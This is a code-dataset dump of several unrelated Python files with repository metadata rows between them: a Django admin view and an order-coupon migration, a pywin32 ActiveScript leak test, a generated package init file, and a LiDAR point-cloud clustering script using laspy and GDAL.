@version: 2016/5/17 0017
@author: zhangyunrui
@contact: david.zhang@maiziedu.com
@file: views.py
@time: 2016/5/17 0017 10:48
@note: 教务端自己可见VIEWS
"""
from django.shortcuts import render
from mz_common.decorators import eduadmin_required
from mz_usercenter.base.context import get_usercenter_context
from mz_usercenter.eduadmin.interface import EduAdminOverview
@eduadmin_required
def view_index(request):
"""
教务面板
:param request:
:return:
"""
user_id = request.user.id
edu_info = EduAdminOverview.get_info(user_id)
return render(request, 'mz_usercenter/eduadmin/homepage.html', locals(),
context_instance=get_usercenter_context(request))
|
[
"1461847795@qq.com"
] |
1461847795@qq.com
|
|
45c2ef41ea4cb46acafc9a71ea9a5b4744b680b5
|
9ebeb33e168798d41b54a8ab474b00c160de43a2
|
/orders/migrations/0002_auto_20200822_0401.py
|
4701bcd93bd83faa6a3cc16743f6a5882c6e3e11
|
[] |
no_license
|
danielspring-crypto/tritrade
|
0c1f961138b9e4892d53ece98b54094be0e4c4b9
|
6fc7c644c1657a7744703cd144be7fbb5320397c
|
refs/heads/master
| 2022-12-04T13:21:07.761942
| 2020-08-28T00:02:36
| 2020-08-28T00:02:36
| 290,908,032
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 824
|
py
|
# Generated by Django 3.1 on 2020-08-22 04:01
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('coupons', '0001_initial'),
('orders', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='order',
name='coupon',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='orders', to='coupons.coupon'),
),
migrations.AddField(
model_name='order',
name='discount',
field=models.IntegerField(default=0, validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(100)]),
),
]
|
[
"you@example.com"
] |
you@example.com
|
eff6edbbee741710b0632dba047bfdf05bcd4856
|
a0883db90ffd673650af8ffab53c158f4cd21b32
|
/venv/Lib/site-packages/win32comext/axscript/test/leakTest.py
|
c228f447182c3ff5f84da194484524df3b8d8f67
|
[] |
no_license
|
deshudiosh/PyMs
|
3bda141378cbc0b847f19f70fe461625feed5a4b
|
c06749db6e7e53f96686d07f9d2b44b2f1290832
|
refs/heads/master
| 2020-03-26T22:11:11.574421
| 2018-08-24T16:52:48
| 2018-08-24T16:52:48
| 145,438,274
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,562
|
py
|
import sys
from win32com.axscript.server.error import Exception
from win32com.axscript import axscript
from win32com.axscript.server import axsite
import pythoncom
from win32com.server import util, connect
import win32com.server.policy
class MySite(axsite.AXSite):
def OnScriptError(self, error):
exc = error.GetExceptionInfo()
context, line, char = error.GetSourcePosition()
print(" >Exception:", exc[1])
try:
st = error.GetSourceLineText()
except pythoncom.com_error:
st = None
if st is None: st = ""
text = st + "\n" + (" " * (char-1)) + "^" + "\n" + exc[2]
for line in text.splitlines():
print(" >" + line)
class MyCollection(util.Collection):
def _NewEnum(self):
print("Making new Enumerator")
return util.Collection._NewEnum(self)
class Test:
_public_methods_ = [ 'echo' ]
_public_attrs_ = ['collection', 'verbose']
def __init__(self):
self.verbose = 0
self.collection = util.wrap( MyCollection( [1,'Two',3] ))
self.last = ""
# self._connect_server_ = TestConnectServer(self)
def echo(self, *args):
self.last = ''.join(map(str, args))
if self.verbose:
for arg in args:
print(arg, end=' ')
print()
# self._connect_server_.Broadcast(last)
#### Connections currently wont work, as there is no way for the engine to
#### know what events we support. We need typeinfo support.
IID_ITestEvents = pythoncom.MakeIID("{8EB72F90-0D44-11d1-9C4B-00AA00125A98}")
class TestConnectServer(connect.ConnectableServer):
_connect_interfaces_ = [IID_ITestEvents]
# The single public method that the client can call on us
# (ie, as a normal COM server, this exposes just this single method.
def __init__(self, object):
self.object = object
def Broadcast(self,arg):
# Simply broadcast a notification.
self._BroadcastNotify(self.NotifyDoneIt, (arg,))
def NotifyDoneIt(self, interface, arg):
interface.Invoke(1000, 0, pythoncom.DISPATCH_METHOD, 1, arg)
VBScript = """\
prop = "Property Value"
sub hello(arg1)
test.py.echo arg1
end sub
sub testcollection
test.py.verbose = 1
for each item in test.py.collection
test.py.echo "Collection item is", item
next
end sub
"""
if sys.version_info < (3,):
PyScript = """print "PyScript is being parsed..."\n"""
else:
PyScript = """print("PyScript is being parsed...")\n"""
PyScript += """\
prop = "Property Value"
def hello(arg1):
test.py.echo(arg1)
pass
def testcollection():
test.py.verbose = 1
# test.py.collection[1] = "New one"
for item in test.py.collection:
test.py.echo("Collection item is", item)
pass
"""
ErrScript = """\
bad code for everyone!
"""
def TestEngine(engineName, code, bShouldWork = 1):
echoer = Test()
model = {
'test.py' : util.wrap(echoer),
}
site = MySite(model)
engine = site._AddEngine(engineName)
engine.AddCode(code, axscript.SCRIPTTEXT_ISPERSISTENT)
try:
engine.Start()
finally:
if not bShouldWork:
engine.Close()
return
doTestEngine(engine, echoer)
# re-transition the engine back to the UNINITIALIZED state, a-la ASP.
engine.eScript.SetScriptState(axscript.SCRIPTSTATE_UNINITIALIZED)
engine.eScript.SetScriptSite(util.wrap(site))
print("restarting")
engine.Start()
# all done!
engine.Close()
def doTestEngine(engine, echoer):
# Now call into the scripts IDispatch
from win32com.client.dynamic import Dispatch
ob = Dispatch(engine.GetScriptDispatch())
try:
ob.hello("Goober")
except pythoncom.com_error as exc:
print("***** Calling 'hello' failed", exc)
return
if echoer.last != "Goober":
print("***** Function call didnt set value correctly", repr(echoer.last))
if str(ob.prop) != "Property Value":
print("***** Property Value not correct - ", repr(ob.prop))
ob.testcollection()
# Now make sure my engines can evaluate stuff.
result = engine.eParse.ParseScriptText("1+1", None, None, None, 0, 0, axscript.SCRIPTTEXT_ISEXPRESSION)
if result != 2:
print("Engine could not evaluate '1+1' - said the result was", result)
def dotestall():
for i in range(10):
TestEngine("Python", PyScript)
print(sys.gettotalrefcount())
## print "Testing Exceptions"
## try:
## TestEngine("Python", ErrScript, 0)
## except pythoncom.com_error:
## pass
def testall():
dotestall()
pythoncom.CoUninitialize()
print("AXScript Host worked correctly - %d/%d COM objects left alive." % (pythoncom._GetInterfaceCount(), pythoncom._GetGatewayCount()))
if __name__ == '__main__':
testall()
|
[
"deshudiosh@gmail.com"
] |
deshudiosh@gmail.com
|
d673b62e680b4d86249bac3164dfec8faef49055
|
3a85089c2498ff04d1b9bce17a4b8bf6cf2380c9
|
/SimG4CMS/ShowerLibraryProducer/python/__init__.py
|
5f4692dfe95ccd32b24af996341d7813c9d43441
|
[] |
no_license
|
sextonkennedy/cmssw-ib
|
c2e85b5ffa1269505597025e55db4ffee896a6c3
|
e04f4c26752e0775bd3cffd3a936b288ee7b0268
|
HEAD
| 2016-09-01T20:09:33.163593
| 2013-04-26T12:05:17
| 2013-04-29T16:40:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 212
|
py
|
#Automatically created by SCRAM
import os
__path__.append(os.path.dirname(os.path.abspath(__file__).rsplit('/SimG4CMS/ShowerLibraryProducer/',1)[0])+'/cfipython/slc6_amd64_gcc480/SimG4CMS/ShowerLibraryProducer')
|
[
"giulio.eulisse@cern.ch"
] |
giulio.eulisse@cern.ch
|
dce37f9b796d24bea56707b6c9e337138d39b7c8
|
22767a6d0d42b040846e024fb8f2276df89e832d
|
/LiDar_read3.py
|
f4efcdbf937325390d6a951eb4ef82d9f3266cfc
|
[] |
no_license
|
hhs732/snowforest_modeling
|
a42bb7387ac02c864c1cc8ca88e165a40e0ba4db
|
4c40d854b8c45a3614c44a33798800e232b4109a
|
refs/heads/master
| 2020-03-21T16:36:00.416250
| 2019-07-03T22:06:46
| 2019-07-03T22:06:46
| 138,780,442
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,166
|
py
|
import laspy as ls
import numpy as np
import scipy
from scipy.spatial.kdtree import KDTree
import matplotlib.pyplot as plt
class K_Means:
def __init__(self, numOfClusters=2, init_centroids=None):
self.numOfClusters = numOfClusters
self.centroids={}
for i in range(self.numOfClusters):
self.centroids[i] = init_centroids[i]
def fit(self,data):
self.classifications = {}
for i in range(self.numOfClusters):
self.classifications[i] = []
for featureset in data:
distances = [np.linalg.norm(featureset-self.centroids[centroid]) for centroid in self.centroids]
classification = distances.index(min(distances))
self.classifications[classification].append(featureset)
def predict(self,data):
distances = [np.linalg.norm(data-self.centroids[centroid]) for centroid in self.centroids]
classification = distances.index(min(distances))
return classification
#%%
infile = ls.file.File("lidardata\sagehen_testveg.las", mode="r")
infileGrd = ls.file.File("lidardata\sagehen_testGrd.las", mode="r")
# Grab all of the points from the file.
point_records = infile.points
# Grab just the X dimension from the file, and scale it.
def scaled_x_dimension(las_file):
x_dimension = las_file.X
scale = las_file.header.scale[0]
offset = las_file.header.offset[0]
return(x_dimension*scale + offset)
scaled_x = scaled_x_dimension(infile)
#%%
# Find out what the point format looks like.
pointformat = infile.point_format
for spec in infile.point_format:
print(spec.name)
#Lets take a look at the header also.
headerformat = infile.header.header_format
for spec in headerformat:
print(spec.name)
#%%
# Grab the scaled x, y, and z dimensions and stick them together in an nx3 numpy array
coords = np.vstack((infile.x, infile.y, infile.z)).T
coordsGrd = np.vstack((infileGrd.x, infileGrd.y, infileGrd.z)).T
#%% calculating the nearest neighbors of a set of points, you might want to use a highly optimized package like FLANN
dataset = np.vstack([infile.X, infile.Y, infile.Z]).T
datasetGrd = np.vstack([infileGrd.X, infileGrd.Y, infileGrd.Z]).T
#%%we’re interested only in the last return from each pulse in order to do ground detection.
#We can easily figure out which points are the last return by finding out for which points return_num is equal to num_returns.
# Grab the return_num and num_returns dimensions
num_returns = infile.num_returns
return_num = infile.return_num
ground_points = infile.points[num_returns == return_num]
print("%i points out of %i were ground points." % (len(ground_points),len(infile)))
num_returnsG = infileGrd.num_returns
return_numG = infileGrd.return_num
ground_pointsGrd = infileGrd.points[num_returnsG == return_numG]
#%%
groundPoints_ls = ground_points.tolist()
#groundPoints_arr = np.array(groundPoints_ls)
groundPoints_arr = []
for i in range (len(groundPoints_ls)):
GPlist = np.array(groundPoints_ls[i])
groundPoints_arr.append(GPlist[0,0:3])
groundPoints_arr = np.array(groundPoints_arr)
#%%
#from mpl_toolkits.mplot3d import Axes3D
#fig = plt.figure(figsize=(20,15))
#ax = Axes3D(fig)
#ax.scatter(dataset[:, 0], dataset[:, 1], dataset[:, 2])
#plt.savefig('3DallPoints.png')
#%% implementing Kmean
#Number of clusters
k = np.size(groundPoints_arr[:,0])
# Number of training data
n = np.size(dataset[:,0])
# Number of features in the data
#c = dataset.shape[1]
centers = groundPoints_arr.copy()
clusters = np.zeros(n)
distances = np.zeros((n,k))
# Measure the distance to every center
for i in range(k):
distances[:,i] = np.linalg.norm(dataset - centers[i], axis=1)
# Assign all training data to closest center
clusters = np.argmin(distances, axis = 1)
#%%new metnod (class) for Kmean
centroids=groundPoints_arr.copy()
# instantiate a class
clf = K_Means(numOfClusters=k,init_centroids=centroids)
# fit kmean class to data
clf.fit(dataset)
# get classification
classes = clf.classifications
#%% DEM file (.tif) reading
#import gzip
#with gzip.open("lidardata\sagehen_demveg.tin.gz", 'rb') as f:
# for line in f:
# print(line)
from osgeo import gdal
demfile = gdal.Open("lidardata\output.tin.tif", gdal.GA_ReadOnly)
lyr = gdal.GDALDEMProcessingOptions_swigregister(demfile)
print("Driver: {}/{}".format(demfile.GetDriver().ShortName,demfile.GetDriver().LongName))
print("Size is {} x {} x {}".format(demfile.RasterXSize,demfile.RasterYSize,demfile.RasterCount))
print("Projection is {}".format(demfile.GetProjection()))
geotransform = demfile.GetGeoTransform()
if geotransform:
print("Origin = ({}, {})".format(geotransform[0], geotransform[3]))
print("Pixel Size = ({}, {})".format(geotransform[1], geotransform[5]))
band = demfile.GetRasterBand(1)
print("Band Type={}".format(gdal.GetDataTypeName(band.DataType)))
min0 = band.GetMinimum()
max0 = band.GetMaximum()
if not min or not max:
(min,max) = band.ComputeRasterMinMax(True)
print("Min={:.3f}, Max={:.3f}".format(min,max))
if band.GetOverviewCount() > 0:
print("Band has {} overviews".format(band.GetOverviewCount()))
if band.GetRasterColorTable():
print("Band has a color table with {} entries".format(band.GetRasterColorTable().GetCount()))
scanline = band.ReadRaster(xoff=0, yoff=0, xsize=band.XSize, ysize=1,
buf_xsize=band.XSize, buf_ysize=1,
buf_type=gdal.GDT_Float32)
import struct
tuple_of_floats = struct.unpack('f' * band.XSize, scanline)
#Y
#Z
#intensity
#flag_byte
#raw_classification
#scan_angle_rank
#user_data
#pt_src_id
#gps_time
#file_sig ???????????????????
#file_source_id
#global_encoding
#proj_id_1 ??????????????
#proj_id_2 ????????????????
#proj_id_3 ?????????
#proj_id_4 ???????????/
#version_major
#version_minor
#system_id
#software_id
#created_day
#created_year
#header_size
#data_offset
#num_variable_len_recs
#data_format_id
#data_record_length
#point_records_count
#point_return_count
#x_scale
#y_scale
#z_scale
#x_offset
#y_offset
#z_offset
#x_max
#x_min
#y_max
#y_min
#z_max
#z_min
|
[
"safa.hamideh@gmail.com"
] |
safa.hamideh@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.